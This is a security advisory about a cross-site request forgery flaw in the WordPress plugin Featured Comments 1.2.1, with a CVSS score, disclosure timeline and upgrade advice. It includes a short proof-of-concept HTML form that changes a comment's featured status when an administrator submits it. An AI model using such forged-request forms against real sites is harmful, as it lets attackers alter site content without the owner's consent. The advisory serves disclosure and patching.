CSRF in Featured Comments 1.2.1 allows an attacker to set and unset comment statuses


Last revised:

An attacker able to convince an admin to visit a link of their choosing is able to set/unset the buried/featured status of any comments.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 4.3 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality None
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

If a logged-in administrator user clicks the submit button on this form comment with ID of 9 will be featured. (In a real attack the form can be made to auto-submit using Javascript).

<form action="http://localhost/wp-admin/admin-ajax.php?action=feature_comments" method="POST">
  <input type="text" name="do" value="feature">
  <input type="text" name="comment_id" value="9">
  <input type="submit">

Advisory timeline

  • 2014-05-22: Discovered
  • 2014-05-23: Email address for report requested via contact form at
  • 2014-05-26: Author acknowledged report
  • 2014-06-10: dxw chased to establish timeline for a fix
  • 2014-06-10: Report accidentally posted to mailing lists – author advised.
  • 2014-07-10: Author reports plugin fixed

Mitigation/further actions

Upgrade to version 1.2.2 or newer.